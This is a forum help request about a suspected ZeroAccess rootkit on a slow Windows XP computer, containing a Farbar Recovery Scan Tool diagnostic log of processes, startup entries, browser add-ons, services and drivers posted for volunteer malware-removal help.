
Possible ZeroAccess rootkit infection - computer very slow - IP changed


  • This topic is locked
20 replies to this topic

#1 danielzink

Posted 19 June 2015 - 04:48 PM

Possible ZeroAccess rootkit infection - computer very slow - IP changed.

Thanks for any and all help

FRST Logs:

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 13-06-2015
Ran by Daniel (administrator) on DAN on 19-06-2015 17:39:54
Running from E:\AV\frst
Loaded Profiles: Daniel (Available Profiles: Daniel)
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8 (Default browser path: "H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Application\torch.exe" -- "%1")
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(ATI Technologies Inc.) H:\WINDOWS\system32\ati2evxx.exe
(ATI Technologies Inc.) H:\WINDOWS\system32\ati2evxx.exe
(brother Industries Ltd) H:\WINDOWS\system32\brsvc01a.exe
(brother Industries Ltd) H:\WINDOWS\system32\brss01a.exe
(SUPERAntiSpyware.com) H:\Program Files\SUPERAntiSpyware\SASCORE.EXE
(Apple Inc.) H:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) H:\Program Files\Bonjour\mDNSResponder.exe
(ESET) H:\Program Files\ESET\ESET Smart Security\ekrn.exe
(Oracle Corporation) H:\Program Files\Java\jre7\bin\jqs.exe
(Hewlett-Packard Company) H:\Program Files\Common Files\LightScribe\LSSrvc.exe
(Microsoft Corporation) H:\Program Files\IIS\Microsoft Web Deploy\MsDepSvc.exe
() H:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
() H:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
() H:\Program Files\CyberLink\Shared files\RichVideo.exe
(TeamViewer GmbH) H:\Program Files\TeamViewer\TeamViewer_Service.exe
(TorchMedia Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe
(Western Digital Technologies, Inc.) H:\Program Files\Western Digital\WD Drive Manager\WDDriveService.exe
(Microsoft Corporation) H:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Western Digital Technologies, Inc.) H:\Program Files\Western Digital\WD SmartWare\WDBackupEngine.exe
(Microsoft Corporation) H:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) H:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(TeamViewer GmbH) H:\Program Files\TeamViewer\TeamViewer.exe
(TeamViewer GmbH) H:\Program Files\TeamViewer\tv_w32.exe
(ScanSoft, Inc.) H:\Program Files\ScanSoft\PaperPort\pptd40nt.exe
(ESET) H:\Program Files\ESET\ESET Smart Security\egui.exe
(Adobe Systems Inc.) H:\Program Files\Adobe\Acrobat 9.0\Acrobat\acrotray.exe
(CyberLink) H:\Program Files\CyberLink\Power2Go\CLMLSvc.exe
(CyberLink Corp.) H:\Program Files\CyberLink\PowerDVD9\PDVD9Serv.exe
(cyberlink) H:\Program Files\CyberLink\Shared files\brs.exe
() H:\Program Files\DivX\DivX Update\DivXUpdate.exe
(Oracle Corporation) H:\Program Files\Common Files\Java\Java Update\jusched.exe
(Western Digital Technologies, Inc.) H:\Program Files\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe
(Western Digital Technologies, Inc.) H:\Program Files\Western Digital\WD Quick View\WDDMStatus.exe
(Apple Inc.) H:\Program Files\iTunes\iTunesHelper.exe
(Apple Inc.) H:\Program Files\iPod\bin\iPodService.exe
(Advanced Micro Devices Inc.) H:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) H:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Google Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
(Google Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
(Google Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
(Google Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
(BitLeader) H:\Program Files\lg_fwupdate\fwupdate.exe
(Google Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
(Google Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) H:\WINDOWS\system32\msiexec.exe
(Microsoft Corporation) H:\WINDOWS\system32\cmd.exe
(Microsoft Corporation) H:\WINDOWS\system32\msiexec.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [GrooveMonitor] => H:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [googletalk] => H:\Program Files\Google\Google Talk\googletalk.exe [3739648 2007-01-01] (Google)
HKLM\...\Run: [SSBkgdUpdate] => H:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe [155648 2003-10-14] (Scansoft, Inc.)
HKLM\...\Run: [PaperPort PTD] => H:\Program Files\ScanSoft\PaperPort\pptd40nt.exe [57393 2004-04-14] (ScanSoft, Inc.)
HKLM\...\Run: [IndexSearch] => H:\Program Files\ScanSoft\PaperPort\IndexSearch.exe [40960 2004-04-14] (ScanSoft, Inc.)
HKLM\...\Run: [egui] => H:\Program Files\ESET\ESET Smart Security\egui.exe [2140880 2010-02-22] (ESET)
HKLM\...\Run: [Adobe ARM] => H:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-03] ()
HKLM\...\Run: [RTHDCPL] => H:\WINDOWS\RTHDCPL.EXE [16050176 2006-08-14] (Realtek Semiconductor Corp.)
HKLM\...\Run: [Adobe Acrobat Speed Launcher] => H:\Program Files\Adobe\Acrobat 9.0\Acrobat\Acrobat_sl.exe [40376 2012-03-27] (Adobe Systems Incorporated)
HKLM\...\Run: [Acrobat Assistant 8.0] => H:\Program Files\Adobe\Acrobat 9.0\Acrobat\Acrotray.exe [640440 2012-03-26] (Adobe Systems Inc.)
HKLM\...\Run: [UpdateLBPShortCut] => H:\Program Files\CyberLink\LabelPrint\MUITransfer\MUIStartMenu.exe [222504 2009-05-19] (CyberLink Corp.)
HKLM\...\Run: [MDS_Menu] => H:\Program Files\CyberLink\MediaShow4\MUITransfer\MUIStartMenu.exe [218408 2009-02-25] (CyberLink Corp.)
HKLM\...\Run: [CLMLServer] => H:\Program Files\CyberLink\Power2Go\CLMLSvc.exe [103720 2009-12-15] (CyberLink)
HKLM\...\Run: [UpdateP2GoShortCut] => H:\Program Files\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe [222504 2009-05-19] (CyberLink Corp.)
HKLM\...\Run: [RemoteControl9] => H:\Program Files\CyberLink\PowerDVD9\PDVD9Serv.exe [87336 2009-07-06] (CyberLink Corp.)
HKLM\...\Run: [BDRegion] => H:\Program Files\Cyberlink\Shared files\brs.exe [75048 2010-05-14] (cyberlink)
HKLM\...\Run: [UpdatePPShortCut] => H:\Program Files\CyberLink\PowerProducer\MUITransfer\MUIStartMenu.exe [218408 2008-12-03] (CyberLink Corp.)
HKLM\...\Run: [LGODDFU] => H:\Program Files\lg_fwupdate\lgfw.exe [27760 2012-08-15] (Bitleader)
HKLM\...\Run: [UpdatePSTShortCut] => H:\Program Files\CyberLink\Blu-ray Disc Suite\MUITransfer\MUIStartMenu.exe [222504 2010-06-02] (CyberLink Corp.)
HKLM\...\Run: [APSDaemon] => H:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-03-20] (Apple Inc.)
HKLM\...\Run: [DivXMediaServer] => H:\Program Files\DivX\DivX Media Server\DivXMediaServer.exe [448520 2015-05-05] (DivX, LLC)
HKLM\...\Run: [DivXUpdate] => H:\Program Files\DivX\DivX Update\DivXUpdate.exe [1861968 2014-01-10] ()
HKLM\...\Run: [ControlCenter2.0] => H:\Program Files\Brother\ControlCenter2\brctrcen.exe [851968 2004-07-20] (Brother Industries, Ltd.)
HKLM\...\Run: [SunJavaUpdateSched] => H:\Program Files\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKLM\...\Run: [QuickTime Task] => H:\Program Files\QuickTime\qttask.exe [421888 2014-10-02] (Apple Inc.)
HKLM\...\Run: [SetDefPrt] => H:\Program Files\Brother\Brmfl04a\BrStDvPt.exe [49152 2004-05-10] (Brother Industories, Ltd.)
HKLM\...\Run: [DriveUtilitiesHelper] => H:\Program Files\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe [1852264 2014-05-23] (Western Digital Technologies, Inc.)
HKLM\...\Run: [WD Quick View] => H:\Program Files\Western Digital\WD Quick View\WDDMStatus.exe [5564784 2015-02-12] (Western Digital Technologies, Inc.)
HKLM\...\Run: [iTunesHelper] => H:\Program Files\iTunes\iTunesHelper.exe [157480 2015-04-07] (Apple Inc.)
HKLM\...\Run: [KernelFaultCheck] => %systemroot%\system32\dumprep 0 -k
HKLM\...\Run: [StartCCC] => H:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2013-04-11] (Advanced Micro Devices, Inc.)
Winlogon\Notify\AtiExtEvent: H:\WINDOWS\system32\Ati2evxx.dll [2013-04-11] (ATI Technologies Inc.)
Winlogon\Notify\WgaLogon: H:\WINDOWS\system32\WgaLogon.dll [2012-01-05] ()
HKU\S-1-5-21-1645522239-117609710-725345543-1003\...\Run: [Google Update] => H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [107912 2014-10-18] (Google Inc.)
HKU\S-1-5-21-1645522239-117609710-725345543-1003\...\Run: [SUPERAntiSpyware] => H:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [6714136 2015-06-06] (SUPERAntiSpyware)
HKU\S-1-5-21-1645522239-117609710-725345543-1003\...\Run: [GoogleChromeAutoLaunch_857B56F6900A6878C72A3C0E6AFBF7B4] => H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe [813896 2015-06-05] (Google Inc.)
SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, credssp.dll
Startup: H:\Documents and Settings\All Users\Start Menu\Programs\Startup\Status Monitor.lnk [2014-03-25]
ShortcutTarget: Status Monitor.lnk -> H:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe (Brother Industries, Ltd.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1645522239-117609710-725345543-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.cnn.com/
HKU\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> H:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-03-26] (Adobe Systems Incorporated)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> H:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> H:\Program Files\Java\jre7\bin\ssv.dll [2014-07-25] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> H:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> H:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2012-03-26] (Adobe Systems Incorporated)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> H:\Program Files\Java\jre7\bin\jp2ssv.dll [2014-07-25] (Oracle Corporation)
BHO: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> H:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2012-03-26] (Adobe Systems Incorporated)
Toolbar: HKLM - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - H:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2012-03-26] (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-1645522239-117609710-725345543-1003 -> Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - H:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2012-03-26] (Adobe Systems Incorporated)
DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/_layouts/ClientBin/ieawsdc32.cab
DPF: {0D6709DD-4ED8-40CA-B459-2757AEEF7BEE} http://download.gigabyte.com.tw/object/Dldrv.ocx
DPF: {4B54A9DE-EF1C-4EBE-A328-7C28EA3B433A} http://quickscan.bitdefender.com/qsax/qsax.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} https://secure.logmein.com//activex/ractrl.cab?lmi=1007
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - H:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
ShellExecuteHooks: SABShellExecuteHook Class - {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - H:\Program Files\SUPERAntiSpyware\SASSEH.DLL [115440 2013-05-07] (SuperAdBlocker.com)
Winsock: Catalog5 01 mswsock.dll File not found ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 03 mswsock.dll File not found ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 04 H:\Program Files\Bonjour\mdnsNSP.dll [121704 2011-08-30] (Apple Inc.)
Winsock: Catalog9 04 mswsock.dll File not found
Winsock: Catalog9 05 mswsock.dll File not found
 
FireFox:
========
FF ProfilePath: H:\Documents and Settings\Daniel\Application Data\Mozilla\Firefox\Profiles\fq27hxil.default
FF Homepage: hxxp://www.cnn.com/
FF NetworkProxy: "no_proxies_on", "*.local"
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> H:\WINDOWS\system32\Macromed\Flash\NPSWF32_12_0_0_77.dll [2014-03-11] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> H:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> H:\Program Files\DivX\DivX OVS Helper\npovshelper.dll [2014-05-22] (DivX, LLC.)
FF Plugin: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> H:\Program Files\DivX\DivX Web Player\npdivx32.dll [2015-05-14] (DivX, LLC)
FF Plugin: @java.com/DTPlugin,version=10.67.2 -> H:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-07-25] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.67.2 -> H:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2014-07-25] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> H:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll [2013-09-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> H:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: Adobe Acrobat -> H:\Program Files\Adobe\Acrobat 9.0\Acrobat\Air\nppdf32.dll [2012-03-26] (Adobe Systems Inc.)
FF Plugin: TorchVLC -> H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Plugins\Video\VLC\npvlc.dll [2013-07-30] (VideoLAN)
FF Plugin HKU\S-1-5-21-1645522239-117609710-725345543-1003: @citrixonline.com/appdetectorplugin -> H:\Documents and Settings\Daniel\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll [2013-10-10] (Citrix Online)
FF Plugin HKU\S-1-5-21-1645522239-117609710-725345543-1003: @talk.google.com/GoogleTalkPlugin -> H:\Documents and Settings\Daniel\Application Data\Mozilla\plugins\npgoogletalk.dll [2015-04-17] (Google)
FF Plugin HKU\S-1-5-21-1645522239-117609710-725345543-1003: @talk.google.com/O1DPlugin -> H:\Documents and Settings\Daniel\Application Data\Mozilla\plugins\npo1d.dll [2015-04-17] (Google)
FF Plugin HKU\S-1-5-21-1645522239-117609710-725345543-1003: @tools.google.com/Google Update;version=3 -> H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-22] (Google Inc.)
FF Plugin HKU\S-1-5-21-1645522239-117609710-725345543-1003: @tools.google.com/Google Update;version=9 -> H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-22] (Google Inc.)
FF Plugin ProgramFiles/Appdata: H:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2014-10-28] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: H:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2014-10-28] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: H:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2014-10-28] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: H:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2014-10-28] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: H:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2014-10-28] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: H:\Documents and Settings\Daniel\Application Data\mozilla\plugins\npgoogletalk.dll [2015-04-17] (Google)
FF Plugin ProgramFiles/Appdata: H:\Documents and Settings\Daniel\Application Data\mozilla\plugins\npo1d.dll [2015-04-17] (Google)
FF Extension: Flagfox - H:\Documents and Settings\Daniel\Application Data\Mozilla\Firefox\Profiles\fq27hxil.default\Extensions\{1018e4d6-728f-4b20-ad56-37578a4de76b} [2012-12-17]
FF Extension: Microsoft .NET Framework Assistant - H:\Documents and Settings\Daniel\Application Data\Mozilla\Firefox\Profiles\fq27hxil.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-08-24]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-08-13]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2012-10-06]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2012-10-26]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - h:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - h:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2010-08-19]
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - H:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
FF Extension: ESET Smart Security Extension - H:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird [2010-08-20]
FF ExtraCheck: H:\Program Files\mozilla firefox\defaults\pref\itms.js [2015-04-03]
 
Chrome: 
=======
CHR Profile: H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (YouTube) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-23]
CHR Extension: (No Name) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\cbdjiinahkdjdcdlgfimlcolkjpbooja [2013-03-04]
CHR Extension: (Google Search) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-23]
CHR Extension: (Tidy Sidebar) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dgmacifhhpefamjmolpipkijcofcmbgp [2015-04-07]
CHR Extension: (Hangouts) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\knipolnnllmklapflnccelgolnpehhpl [2015-02-27]
CHR Extension: (Chrome Hotword Shared Module) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-12]
CHR Extension: (Video Downloader [FVD]) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lfmhcpmkbdkbgbmkjoiopeeegenkdikp [2013-05-27]
CHR Extension: (Google Wallet) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR Extension: (Gmail) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-23]
StartMenuInternet: Google Chrome - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 !SASCORE; H:\Program Files\SUPERAntiSpyware\SASCORE.EXE [142648 2014-08-19] (SUPERAntiSpyware.com)
S2 brmfrmps; H:\WINDOWS\system32\Brmfrmps.exe [65536 2003-05-05] (Brother Industries, Ltd.) [File not signed]
R2 Brother XP spl Service; H:\WINDOWS\system32\brsvc01a.exe [57344 2002-04-12] (brother Industries Ltd)
S2 CLKMSVC10_EAE0C07E; H:\Program Files\CyberLink\PowerDVD9\NavFilter\kmsvc.exe [246256 2010-05-14] (CyberLink)
S3 EhttpSrv; H:\Program Files\ESET\ESET Smart Security\EHttpSrv.exe [33560 2010-02-22] (ESET)
R2 ekrn; H:\Program Files\ESET\ESET Smart Security\ekrn.exe [810120 2010-02-22] (ESET)
S3 FLEXnet Licensing Service; H:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [651720 2010-11-18] (Macrovision Europe Ltd.) [File not signed]
R2 JavaQuickStarterService; H:\Program Files\Java\jre7\bin\jqs.exe [182696 2014-07-25] (Oracle Corporation)
R2 LightScribeService; H:\Program Files\Common Files\LightScribe\LSSrvc.exe [73728 2010-11-22] (Hewlett-Packard Company) [File not signed]
S2 MBAMService; H:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-04-14] (Malwarebytes Corporation)
R2 MsDepSvc; H:\Program Files\IIS\Microsoft Web Deploy\MsDepSvc.exe [88712 2014-09-26] (Microsoft Corporation)
R2 MySQL; H:\Program Files\MySQL\MySQL Server 5.1\my.ini [8951 2015-01-01] () [File not signed]
R2 Net Driver HPZ12; H:\WINDOWS\system32\HPZinw12.dll [44032 2009-05-14] (Hewlett-Packard) [File not signed]
R2 PassThru Service; H:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [80896 2011-03-31] () [File not signed]
R2 Pml Driver HPZ12; H:\WINDOWS\system32\HPZipm12.dll [53760 2009-05-14] (Hewlett-Packard) [File not signed]
R2 RichVideo; H:\Program Files\CyberLink\Shared files\RichVideo.exe [244904 2009-07-02] () [File not signed]
R2 TeamViewer; H:\Program Files\TeamViewer\TeamViewer_Service.exe [5495056 2015-06-01] (TeamViewer GmbH)
R2 TorchCrashHandler; H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe [1217032 2015-05-12] (TorchMedia Inc.) <==== ATTENTION
R2 WDBackup; H:\Program Files\Western Digital\WD SmartWare\WDBackupEngine.exe [1042808 2015-02-12] (Western Digital Technologies, Inc.)
R2 WDDriveService; H:\Program Files\Western Digital\WD Drive Manager\WDDriveService.exe [302968 2015-02-12] (Western Digital Technologies, Inc.)
S4 BITS; C:\WINDOWS\system32\qmgr.dll [X]
S4 wuauserv; C:\WINDOWS\system32\wuauserv.dll [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 Ambfilt; H:\WINDOWS\System32\drivers\Ambfilt.sys [1691480 2009-11-17] (Creative)
R1 AmdPPM; H:\WINDOWS\System32\DRIVERS\AmdPPM.sys [33792 2007-04-16] (Advanced Micro Devices)
R3 AtiHDAudioService; H:\WINDOWS\System32\drivers\AtihdXP3.sys [103040 2012-05-14] (Advanced Micro Devices)
S3 BrScnUsb; H:\WINDOWS\System32\Drivers\BrScnUsb.sys [15263 2003-12-19] (Brother Industries Ltd.)
S3 CCDECODE; H:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-13] (Microsoft Corporation)
R2 eamon; H:\WINDOWS\System32\DRIVERS\eamon.sys [139192 2010-02-22] (ESET)
R1 ehdrv; H:\WINDOWS\System32\DRIVERS\ehdrv.sys [114984 2010-02-22] (ESET)
R2 epfw; H:\WINDOWS\System32\DRIVERS\epfw.sys [134488 2010-02-22] (ESET)
R3 Epfwndis; H:\WINDOWS\System32\DRIVERS\Epfwndis.sys [32584 2010-02-22] (ESET)
R1 epfwtdi; H:\WINDOWS\System32\DRIVERS\epfwtdi.sys [55232 2010-02-22] (ESET)
S3 gdrv; H:\WINDOWS\gdrv.sys [17488 2012-03-26] (Windows ® 2000 DDK provider)
S3 grmnusb; H:\WINDOWS\System32\drivers\grmnusb.sys [15720 2012-04-18] (GARMIN Corp.)
R3 IntcAzAudAddService; H:\WINDOWS\System32\drivers\RtkHDAud.sys [4368896 2006-08-15] (Realtek Semiconductor Corp.) [File not signed]
R1 mbamchameleon; H:\WINDOWS\system32\drivers\mbamchameleon.sys [120024 2015-06-18] (Malwarebytes Corporation)
R3 MBAMProtector; H:\WINDOWS\system32\drivers\mbam.sys [23256 2015-04-14] (Malwarebytes Corporation)
S3 Monfilt; H:\WINDOWS\System32\drivers\Monfilt.sys [1395800 2009-11-17] (Creative Technology Ltd.)
S3 NdisIP; H:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-13] (Microsoft Corporation)
R3 NVENETFD; H:\WINDOWS\System32\DRIVERS\NVENETFD.sys [70912 2010-03-04] (NVIDIA Corporation)
R0 nvgts; H:\WINDOWS\System32\DRIVERS\nvgts.sys [168040 2010-04-08] (NVIDIA Corporation)
R3 nvnetbus; H:\WINDOWS\System32\DRIVERS\nvnetbus.sys [13824 2010-03-04] (NVIDIA Corporation)
R3 pcouffin; H:\WINDOWS\System32\Drivers\pcouffin.sys [47360 2011-02-02] (VSO Software) [File not signed]
S3 RTLTEAMING; H:\WINDOWS\System32\DRIVERS\RTLTEAMING.SYS [29184 2009-05-15] (Realtek Semiconductor Corporation) [File not signed]
S3 RTLVLAN; H:\WINDOWS\System32\DRIVERS\RTLVLAN.SYS [17536 2009-02-16] (Realtek Semiconductor Corporation                           ) [File not signed]
R2 RtNdPt5x; H:\WINDOWS\System32\DRIVERS\RtNdPt5x.sys [22016 2008-07-09] (Realtek Semiconductor Corporation                           )
R1 SASDIFSV; H:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS [12880 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; H:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS [67664 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R0 sptd; H:\WINDOWS\System32\Drivers\sptd.sys [466008 2013-06-12] (Duplex Secure Ltd.)
R1 StarPortLite; H:\WINDOWS\System32\DRIVERS\StarPortLite.sys [97920 2013-02-04] (StarWind Software)
S3 catchme; \??\H:\DOCUME~1\Daniel\LOCALS~1\Temp\catchme.sys [X]
S3 easytether; system32\DRIVERS\easytthr.sys [X]
S3 htcdiag; system32\DRIVERS\htcdiag.sys [X]
S4 IntelIde; No ImagePath
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
